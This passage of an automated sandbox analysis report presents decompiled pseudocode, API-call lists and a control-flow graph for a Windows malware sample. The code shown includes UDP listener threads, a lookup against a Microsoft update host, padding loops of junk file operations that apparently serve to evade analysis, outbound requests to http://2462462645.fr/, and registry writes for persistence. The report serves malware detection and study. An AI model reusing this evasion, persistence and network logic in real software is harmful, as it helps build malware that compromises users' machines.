                                                                                  • String ID: 239.255.255.250
                                                                                  • API String ID: 726339449-2186272203
                                                                                  • Opcode ID: bd73957c977b1b1f2f32df8065f8ec9b89bc96f57fbdf92598bbd54f766f39e3
                                                                                  • Instruction ID: b865f0e7113cd30ffca57b294248847536cf2bc14de9108ff1861f92315d7120
                                                                                  • Opcode Fuzzy Hash: bd73957c977b1b1f2f32df8065f8ec9b89bc96f57fbdf92598bbd54f766f39e3
                                                                                  • Instruction Fuzzy Hash: D241F8B4E10209EFDB04DFE4D889BEEBBB5EF48304F108169E905B7290D7B55A44CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 44%
                                                                                  			E0040DC40(intOrPtr __edi, void* __esi) {
                                                                                  				short _v8;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v24;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v33;
                                                                                  				char _v52;
                                                                                  				void* __ebx;
                                                                                  				void* _t21;
                                                                                  				short _t24;
                                                                                  				void* _t25;
                                                                                  				void* _t26;
                                                                                  				void* _t30;
                                                                                  				void* _t31;
                                                                                  				intOrPtr _t38;
                                                                                  				void* _t39;
                                                                                  
                                                                                  				_t39 = __esi;
                                                                                  				_t38 = __edi;
                                                                                  				if(__esi == 0 || __edi == 0) {
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					_t31 = E00408E40(0x24);
                                                                                  					 *_t31 = 0x756470;
                                                                                  					 *(_t31 + 4) = 0;
                                                                                  					_t21 = CreateEventA(0, 1, 0, 0);
                                                                                  					 *(_t31 + 0x10) = _t21;
                                                                                  					__imp__#23(2, 2, 0x11, _t30); // executed
                                                                                  					 *(_t31 + 8) = _t21;
                                                                                  					if(_t21 == 0xffffffff) {
                                                                                  						E0040E0A0(_t31, __edi);
                                                                                  						_t31 = 0;
                                                                                  					}
                                                                                  					if(_t31 == 0) {
                                                                                  						L8:
                                                                                  						return _t31;
                                                                                  					}
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_t24 = _v8;
                                                                                  					_v24 = _t24;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#9(_t39);
                                                                                  					_v30 = _t24;
                                                                                  					_v33 = 1;
                                                                                  					_t25 =  *(_t31 + 8);
                                                                                  					__imp__#21(_t25, 0xffff, 4,  &_v33, 1); // executed
                                                                                  					__imp__#2( *(_t31 + 8),  &_v52, 0x10); // executed
                                                                                  					if(_t25 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t31 + 0xc)) = _t38;
                                                                                  						_t26 = CreateThread(0, 0, E0040DE70, _t31, 0, 0); // executed
                                                                                  						 *(_t31 + 0x14) = _t26;
                                                                                  						goto L8;
                                                                                  					}
                                                                                  					E0040E0A0(_t31, _t38);
                                                                                  					return 0;
                                                                                  				}
                                                                                  			}






















                                                                                  0x0040dc40
                                                                                  0x0040dc40
                                                                                  0x0040dc48
                                                                                  0x0040dd34
                                                                                  0x0040dc56
                                                                                  0x0040dc65
                                                                                  0x0040dc6b
                                                                                  0x0040dc71
                                                                                  0x0040dc78
                                                                                  0x0040dc84
                                                                                  0x0040dc87
                                                                                  0x0040dc8d
                                                                                  0x0040dc93
                                                                                  0x0040dc95
                                                                                  0x0040dc9a
                                                                                  0x0040dc9a
                                                                                  0x0040dc9e
                                                                                  0x0040dd2e
                                                                                  0x00000000
                                                                                  0x0040dd30
                                                                                  0x0040dca6
                                                                                  0x0040dcaa
                                                                                  0x0040dcae
                                                                                  0x0040dcb2
                                                                                  0x0040dcb7
                                                                                  0x0040dcc1
                                                                                  0x0040dcc5
                                                                                  0x0040dcca
                                                                                  0x0040dcd9
                                                                                  0x0040dcde
                                                                                  0x0040dce3
                                                                                  0x0040dcec
                                                                                  0x0040dcfd
                                                                                  0x0040dd06
                                                                                  0x0040dd22
                                                                                  0x0040dd25
                                                                                  0x0040dd2b
                                                                                  0x00000000
                                                                                  0x0040dd2b
                                                                                  0x0040dd08
                                                                                  0x0040dd13
                                                                                  0x0040dd13

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040DC78
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040DC87
                                                                                  • htons.WS2_32(00009E34), ref: 0040DCCA
                                                                                  • setsockopt.WS2_32(?,0000FFFF), ref: 0040DCEC
                                                                                  • bind.WS2_32(?,00000004,00000010), ref: 0040DCFD
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                  • CreateThread.KERNELBASE ref: 0040DD25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                  • String ID:
                                                                                  • API String ID: 4174406920-0
                                                                                  • Opcode ID: 21a6eac36ac45e0ce4c2421bfe1f9b8c88aea41d39b788b7dca26a6014cc2608
                                                                                  • Instruction ID: e4b1bb25e16b1a4212620234c740e3462210c18eb357fd28b9ad958c2a756cf5
                                                                                  • Opcode Fuzzy Hash: 21a6eac36ac45e0ce4c2421bfe1f9b8c88aea41d39b788b7dca26a6014cc2608
                                                                                  • Instruction Fuzzy Hash: B0219FB4644301AEE710DFB48C8AB5B76A0AF48710F50897EFA54DE2C1D7F8C848876A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 16%
                                                                                  			E00409880() {
                                                                                  				intOrPtr _v8;
                                                                                  				short _v10;
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				char _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				short _v30;
                                                                                  				short _v34;
                                                                                  				short _v38;
                                                                                  				intOrPtr _v40;
                                                                                  				short _v42;
                                                                                  				char _v44;
                                                                                  				char _v48;
                                                                                  				intOrPtr _t28;
                                                                                  				char* _t30;
                                                                                  
                                                                                  				_v8 = 0xffffffff;
                                                                                  				_v24 = 0;
                                                                                  				_v22 = 0;
                                                                                  				_v18 = 0;
                                                                                  				_v14 = 0;
                                                                                  				_v10 = 0;
                                                                                  				_v24 = 2;
                                                                                  				__imp__#9(0x50);
                                                                                  				_v22 = 0;
                                                                                  				_t28 = E00409840("www.update.microsoft.com"); // executed
                                                                                  				_v20 = _t28;
                                                                                  				__imp__#23(2, 1, 0); // executed
                                                                                  				_v28 = _t28;
                                                                                  				if(_v28 != 0xffffffff) {
                                                                                  					_t30 =  &_v24;
                                                                                  					__imp__#4(_v28, _t30, 0x10); // executed
                                                                                  					if(_t30 == 0) {
                                                                                  						_v44 = 0;
                                                                                  						_v42 = 0;
                                                                                  						_v38 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v48 = 0x10;
                                                                                  						__imp__#6(_v28,  &_v44,  &_v48); // executed
                                                                                  						_v8 = _v40;
                                                                                  					}
                                                                                  					E00409940(_v28); // executed
                                                                                  				}
                                                                                  				return _v8;
                                                                                  			}




















                                                                                  0x00409886
                                                                                  0x0040988f
                                                                                  0x00409895
                                                                                  0x00409898
                                                                                  0x0040989b
                                                                                  0x0040989e
                                                                                  0x004098a7
                                                                                  0x004098ad
                                                                                  0x004098b3
                                                                                  0x004098bc
                                                                                  0x004098c4
                                                                                  0x004098cd
                                                                                  0x004098d3
                                                                                  0x004098da
                                                                                  0x004098de
                                                                                  0x004098e6
                                                                                  0x004098ee
                                                                                  0x004098f2
                                                                                  0x004098f8
                                                                                  0x004098fb
                                                                                  0x004098fe
                                                                                  0x00409901
                                                                                  0x00409905
                                                                                  0x00409918
                                                                                  0x00409921
                                                                                  0x00409921
                                                                                  0x00409928
                                                                                  0x0040992d
                                                                                  0x00409936

                                                                                  APIs
                                                                                  • htons.WS2_32(00000050), ref: 004098AD
                                                                                    • Part of subcall function 00409840: inet_addr.WS2_32(004098C1), ref: 0040984A
                                                                                    • Part of subcall function 00409840: gethostbyname.WS2_32(?), ref: 0040985D
                                                                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004098CD
                                                                                  • connect.WS2_32(000000FF,?,00000010), ref: 004098E6
                                                                                  • getsockname.WS2_32(000000FF,?,00000010), ref: 00409918
                                                                                  Strings
                                                                                  • www.update.microsoft.com, xrefs: 004098B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                  • String ID: www.update.microsoft.com
                                                                                  • API String ID: 4063137541-1705189816
                                                                                  • Opcode ID: 160b4609061a34cf3d7366ed0b3d6bdc7a70b5745eb5cdbf8b3e4623f1c0186a
                                                                                  • Instruction ID: 4856549373dc0ba92a891a61f9ce0befa44decce286b311d22d51fdce19958fb
                                                                                  • Opcode Fuzzy Hash: 160b4609061a34cf3d7366ed0b3d6bdc7a70b5745eb5cdbf8b3e4623f1c0186a
                                                                                  • Instruction Fuzzy Hash: A121F9B5E102099BCB04DFF8D946AEEBBB5AF08310F10816DE519F3390E7745A45CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 22%
                                                                                  			E0040E110(void* __edi) {
                                                                                  				short _v14;
                                                                                  				short _v18;
                                                                                  				intOrPtr _v20;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				char _v28;
                                                                                  				void* __ebx;
                                                                                  				void* _t15;
                                                                                  				void* _t20;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_t27 = __edi;
                                                                                  				_t24 = E00408E40(0x24);
                                                                                  				 *_t24 = 0x756470;
                                                                                  				 *(_t24 + 4) = 1;
                                                                                  				_t15 = CreateEventA(0, 1, 0, 0);
                                                                                  				 *(_t24 + 0x10) = _t15;
                                                                                  				__imp__#23(2, 2, 0x11); // executed
                                                                                  				 *(_t24 + 8) = _t15;
                                                                                  				if(_t15 == 0xffffffff) {
                                                                                  					E0040E0A0(_t24, __edi);
                                                                                  					_t24 = 0;
                                                                                  				}
                                                                                  				if(_t24 == 0) {
                                                                                  					L6:
                                                                                  					return _t24;
                                                                                  				} else {
                                                                                  					_v26 = 0;
                                                                                  					_v22 = 0;
                                                                                  					_v18 = 0;
                                                                                  					_v14 = 0;
                                                                                  					_v28 = 2;
                                                                                  					__imp__#2( *(_t24 + 8),  &_v28, 0x10); // executed
                                                                                  					if(2 != 0xffffffff) {
                                                                                  						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                  						_t20 = CreateThread(0, 0, E0040DE70, _t24, 0, 0); // executed
                                                                                  						 *(_t24 + 0x14) = _t20;
                                                                                  						goto L6;
                                                                                  					} else {
                                                                                  						E0040E0A0(_t24, _t27);
                                                                                  						return 0;
                                                                                  					}
                                                                                  				}
                                                                                  			}













                                                                                  0x0040e110
                                                                                  0x0040e122
                                                                                  0x0040e128
                                                                                  0x0040e12e
                                                                                  0x0040e135
                                                                                  0x0040e141
                                                                                  0x0040e144
                                                                                  0x0040e14a
                                                                                  0x0040e150
                                                                                  0x0040e152
                                                                                  0x0040e157
                                                                                  0x0040e157
                                                                                  0x0040e15b
                                                                                  0x0040e1ba
                                                                                  0x0040e1c0
                                                                                  0x0040e15d
                                                                                  0x0040e15f
                                                                                  0x0040e163
                                                                                  0x0040e167
                                                                                  0x0040e16b
                                                                                  0x0040e17b
                                                                                  0x0040e185
                                                                                  0x0040e18e
                                                                                  0x0040e1ae
                                                                                  0x0040e1b1
                                                                                  0x0040e1b7
                                                                                  0x00000000
                                                                                  0x0040e190
                                                                                  0x0040e190
                                                                                  0x0040e19b
                                                                                  0x0040e19b
                                                                                  0x0040e18e

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040C2CE,00000000), ref: 0040E135
                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 0040E144
                                                                                  • bind.WS2_32(?,?,00000010), ref: 0040E185
                                                                                    • Part of subcall function 0040E0A0: SetEvent.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0B1
                                                                                    • Part of subcall function 0040E0A0: WaitForSingleObject.KERNEL32(?,000000FF,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0BD
                                                                                    • Part of subcall function 0040E0A0: CloseHandle.KERNEL32(?,?,0040E195,?,?,0040C2CE,00000000), ref: 0040E0C7
                                                                                  • CreateThread.KERNELBASE ref: 0040E1B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3943618503-0
                                                                                  • Opcode ID: 47eef5c5e90b0bbc2b88e8c85aea6492e68199bf9c12c4048a90d4587259c5ac
                                                                                  • Instruction ID: 22c9fd0d58bb21ad2c775b164571bc0b545b0ff679c75b8c31fe2abd1e05f37e
                                                                                  • Opcode Fuzzy Hash: 47eef5c5e90b0bbc2b88e8c85aea6492e68199bf9c12c4048a90d4587259c5ac
                                                                                  • Instruction Fuzzy Hash: E1119170640300AFE7509FB4DC86B5B7AE0EF48710F54897AFA58DE2D2E6F8D844875A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E0040AB50(void* __ecx, BYTE* _a4, int _a8) {
                                                                                  				long* _v8;
                                                                                  				long** _t6;
                                                                                  
                                                                                  				_t6 =  &_v8;
                                                                                  				__imp__CryptAcquireContextW(_t6, 0, 0, 1, 0xf0000040, __ecx); // executed
                                                                                  				if(_t6 != 0) {
                                                                                  					CryptGenRandom(_v8, _a8, _a4);
                                                                                  					return CryptReleaseContext(_v8, 0);
                                                                                  				}
                                                                                  				return _t6;
                                                                                  			}





                                                                                  0x0040ab5f
                                                                                  0x0040ab63
                                                                                  0x0040ab6b
                                                                                  0x0040ab79
                                                                                  0x00000000
                                                                                  0x0040ab85
                                                                                  0x0040ab8e

                                                                                  APIs
                                                                                  • CryptAcquireContextW.ADVAPI32(0040688C,00000000,00000000,00000001,F0000040,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB63
                                                                                  • CryptGenRandom.ADVAPI32(0040688C,?,00000000,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB79
                                                                                  • CryptReleaseContext.ADVAPI32(0040688C,00000000,?,?,0040ABA9,0040688C,00000004,?,?,0040ABDE,000000FF), ref: 0040AB85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1815803762-0
                                                                                  • Opcode ID: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                  • Instruction ID: 1452194909b8924a7c7626270c55186fff6dc5d04cba850d0a96534bec71c57f
                                                                                  • Opcode Fuzzy Hash: eda8b9e6150e8489936fffc678bcc37347e2bbaac9c88bad9fce2d1065103978
                                                                                  • Instruction Fuzzy Hash: 03E09275600308BBDB14CBE1EC49F9A777CAB08740F108154BB0997280DAB1EA40C7A8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 405a20-405a3e Sleep 1 405a48-405a54 0->1 2 405a5a-405a74 FindWindowA 1->2 3 4061df-4061ff CreateMutexA GetLastError 1->3 6 405a7a-405abf Sleep MoveFileA * 2 FindWindowA 2->6 7 4061cb-4061da 2->7 4 406201-406203 ExitProcess 3->4 5 406209-40628e GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 3->5 8 406294-4062ad 5->8 9 405ac1-405ad6 Sleep MoveFileA 6->9 10 405adc-405af1 Sleep 6->10 7->1 11 4062fa-4062ff 8->11 12 4062af-4062b7 8->12 9->10 13 405b02-405b0c 10->13 16 406305-406318 11->16 14 4062b9-4062d4 12->14 15 4062ee-4062f8 12->15 17 405b7a-405bfc DeleteFileW MoveFileW DeleteFileW MoveFileW DeleteFileW Sleep * 2 InternetOpenA DeleteFileW 13->17 18 405b0e-405b75 DeleteFileW MoveFileW Sleep DeleteFileW MoveFileW * 2 Sleep DeleteFileA 13->18 14->11 21 4062d6-4062ec 14->21 15->16 22 406581-4065ac Sleep RegOpenKeyExA 16->22 23 40631e-406329 call 40d4a0 16->23 19 405c02-405c7b DeleteFileW MoveFileA Sleep DeleteFileW Sleep DeleteFileW InternetOpenUrlA Sleep 17->19 20 405cf4-405d73 Sleep InternetCloseHandle Sleep ShowWindow SetForegroundWindow MoveFileA 17->20 18->13 27 405cdc-405cee InternetCloseHandle DeleteFileW 19->27 28 405c7d-405c87 19->28 29 405d79-405ded MoveFileW DeleteFileW MoveFileW Sleep DeleteFileA FindWindowA InternetOpenA 20->29 30 405fca-405fd4 20->30 21->8 21->15 25 4065b2-406692 RegSetValueExA * 7 RegCloseKey 22->25 26 406698-4066b8 RegOpenKeyExA 22->26 46 406333-406381 ExpandEnvironmentStringsW wsprintfW CopyFileW 23->46 47 40632b-40632d ExitProcess 23->47 25->26 32 4067a4-4067b9 Sleep call 40b4a0 26->32 33 4066be-40679e RegSetValueExA * 7 RegCloseKey 26->33 27->20 34 405c98-405ca2 28->34 36 405df3-405e3a MoveFileW * 2 InternetOpenUrlA 29->36 37 405e9b-405eba InternetCloseHandle Sleep 29->37 35 405fde-405fea 30->35 58 40690f-406918 32->58 59 4067bf-406907 WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 404200 call 40d3d0 call 4057b0 CreateEventA call 40abd0 call 40bea0 call 40a020 call 40bf50 * 4 32->59 33->32 34->27 42 405ca4-405cda MoveFileW Sleep MoveFileA Sleep 34->42 39 406055-406062 PathFileExistsA 35->39 40 405fec-406006 FindWindowA 35->40 43 405e83-405e95 InternetCloseHandle Sleep 36->43 44 405e3c-405e7d DeleteFileW Sleep DeleteFileA MoveFileW Sleep DeleteFileW 36->44 37->30 45 405ec0-405f12 ShowWindow DeleteFileW SetForegroundWindow Sleep InternetOpenA 37->45 52 406064-4060d1 DeleteFileA DeleteFileW Sleep DeleteFileW * 6 MoveFileW 39->52 53 4060d7-4060f1 FindWindowA 39->53 48 406053 40->48 49 406008-40604d Sleep DeleteFileW MoveFileW Sleep * 2 40->49 42->34 43->37 44->43 54 405f18-405f3f InternetOpenUrlA 45->54 55 405fbd-405fc4 InternetCloseHandle 45->55 56 406460-4064a2 Sleep wsprintfW CopyFileW 46->56 57 406387-4063b6 SetFileAttributesW RegOpenKeyExW 46->57 48->35 49->48 52->53 61 4060f3-406166 DeleteFileW SetForegroundWindow ShowWindow Sleep MoveFileA DeleteFileA Sleep DeleteFileW * 3 53->61 62 40616c-406176 53->62 63 405f41-405f61 MoveFileW Sleep DeleteFileW 54->63 64 405f67-405fb7 InternetCloseHandle DeleteFileW Sleep MoveFileA DeleteFileW MoveFileW DeleteFileA 54->64 55->30 56->22 60 4064a8-4064d7 SetFileAttributesW RegOpenKeyExW 56->60 65 406441-406456 call 40d740 57->65 66 4063bc-4063d1 57->66 103 40690c 59->103 70 406562-406577 call 40d740 60->70 71 4064dd-4064f2 60->71 61->62 72 406187-406191 62->72 63->64 64->55 65->56 81 406458-40645a ExitProcess 65->81 67 4063d7-4063f6 66->67 67->67 74 4063f8-40643b RegSetValueExW RegCloseKey 67->74 70->22 87 406579-40657b ExitProcess 70->87 77 4064f8-406517 71->77 72->7 79 406193-4061c9 MoveFileW DeleteFileW Sleep MoveFileW 72->79 74->65 77->77 83 406519-40655c RegSetValueExW RegCloseKey 77->83 79->72 83->70 103->58
                                                                                  C-Code - Quality: 98%
                                                                                  			_entry_() {
                                                                                  				short _v524;
                                                                                  				char _v528;
                                                                                  				int _v532;
                                                                                  				int _v536;
                                                                                  				char _v1060;
                                                                                  				void* _v1064;
                                                                                  				char _v1588;
                                                                                  				short _v2108;
                                                                                  				intOrPtr _v2112;
                                                                                  				short _v2636;
                                                                                  				void* _v2640;
                                                                                  				struct HWND__* _v2644;
                                                                                  				long _v2648;
                                                                                  				struct HWND__* _v2652;
                                                                                  				void* _v2656;
                                                                                  				intOrPtr _v2660;
                                                                                  				long _v2664;
                                                                                  				void* _v2668;
                                                                                  				intOrPtr _v2672;
                                                                                  				intOrPtr _v2676;
                                                                                  				struct HWND__* _v2680;
                                                                                  				int _v2684;
                                                                                  				int _v2688;
                                                                                  				struct HWND__* _v2692;
                                                                                  				struct HWND__* _v2696;
                                                                                  				int _v2700;
                                                                                  				char _v3100;
                                                                                  				intOrPtr* _v3104;
                                                                                  				int _v3108;
                                                                                  				short _v3110;
                                                                                  				short _v3112;
                                                                                  				int _v3116;
                                                                                  				int _v3120;
                                                                                  				intOrPtr* _v3124;
                                                                                  				intOrPtr _v3128;
                                                                                  				short _v3130;
                                                                                  				signed int _v3136;
                                                                                  				intOrPtr* _v3140;
                                                                                  				intOrPtr _v3144;
                                                                                  				short _v3146;
                                                                                  				signed int _v3152;
                                                                                  				void* _t182;
                                                                                  				int _t190;
                                                                                  				long _t191;
                                                                                  				long _t193;
                                                                                  				signed char _t194;
                                                                                  				void* _t203;
                                                                                  				intOrPtr _t206;
                                                                                  				intOrPtr _t210;
                                                                                  				signed char _t253;
                                                                                  				signed char _t264;
                                                                                  				struct HWND__* _t271;
                                                                                  				short _t367;
                                                                                  				intOrPtr _t371;
                                                                                  				short _t397;
                                                                                  				intOrPtr _t413;
                                                                                  				intOrPtr _t414;
                                                                                  				void* _t446;
                                                                                  				void* _t447;
                                                                                  				void* _t454;
                                                                                  
                                                                                  				Sleep(0x1b58); // executed
                                                                                  				_v536 = 0;
                                                                                  				_v2112 = 0x2332;
                                                                                  				while(_v536 < _v2112) {
                                                                                  					_t271 = FindWindowA("579795729858927452784", 0); // executed
                                                                                  					_v2644 = _t271;
                                                                                  					if(_v2644 == 0) {
                                                                                  						L40:
                                                                                  						_v536 = _v536 + 1;
                                                                                  						continue;
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					_v2680 = FindWindowA("579795729858927452784", 0);
                                                                                  					if(_v2680 != 0) {
                                                                                  						Sleep(0x3e8);
                                                                                  						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					_v2684 = 0;
                                                                                  					while(_v2684 < 0x7d0) {
                                                                                  						DeleteFileW(L"argarhargafafargh");
                                                                                  						MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
                                                                                  						Sleep(0xbb8);
                                                                                  						DeleteFileW(L"argarhargafafargh");
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						Sleep(0xfa0);
                                                                                  						DeleteFileA("579795729858927452784");
                                                                                  						_v2684 = _v2684 + 1;
                                                                                  					}
                                                                                  					DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					Sleep(0xbb8);
                                                                                  					Sleep(0xbb8);
                                                                                  					_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  					DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
                                                                                  					if(_v2668 == 0) {
                                                                                  						L16:
                                                                                  						Sleep(0x7d0);
                                                                                  						InternetCloseHandle(_v2668);
                                                                                  						Sleep(0x2710);
                                                                                  						ShowWindow(_v2644, 1);
                                                                                  						SetForegroundWindow(_v2644);
                                                                                  						MoveFileA("579795729858927452784", "2dgd828d8g8fg8g8g");
                                                                                  						_v2676 = 0x37;
                                                                                  						_v2660 = 0x2c;
                                                                                  						_v2672 = _v2676 + _v2660;
                                                                                  						if(_v2672 < 0x2328) {
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							DeleteFileW(L"argarhargafafargh");
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							Sleep(0x7d0);
                                                                                  							DeleteFileA("2dgd828d8g8fg8g8g");
                                                                                  							_v2692 = FindWindowA("aefafugaugfgauegf", 0);
                                                                                  							_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  							if(_v2668 != 0) {
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  								if(_v2656 != 0) {
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									Sleep(0x1388);
                                                                                  									DeleteFileA("579795729858927452784");
                                                                                  									MoveFileW(L"4yy4w4yw4fwgwgw", L"argarhrharharfafrahth");
                                                                                  									Sleep(0xfa0);
                                                                                  									DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  								}
                                                                                  								InternetCloseHandle(_v2656);
                                                                                  								Sleep(0xdac);
                                                                                  							}
                                                                                  							InternetCloseHandle(_v2668);
                                                                                  							Sleep(0xfa0);
                                                                                  							if(_v2692 != 0) {
                                                                                  								ShowWindow(_v2692, 0);
                                                                                  								DeleteFileW(L"argarhargafafargh");
                                                                                  								SetForegroundWindow(_v2692);
                                                                                  								Sleep(0x1388);
                                                                                  								_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  								if(_v2668 != 0) {
                                                                                  									_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  									if(_v2656 != 0) {
                                                                                  										MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  										Sleep(0x2710);
                                                                                  										DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  									}
                                                                                  									InternetCloseHandle(_v2656);
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									Sleep(0x64);
                                                                                  									MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  									DeleteFileA("2dgd828d8g8fg8g8g");
                                                                                  								}
                                                                                  								InternetCloseHandle(_v2668);
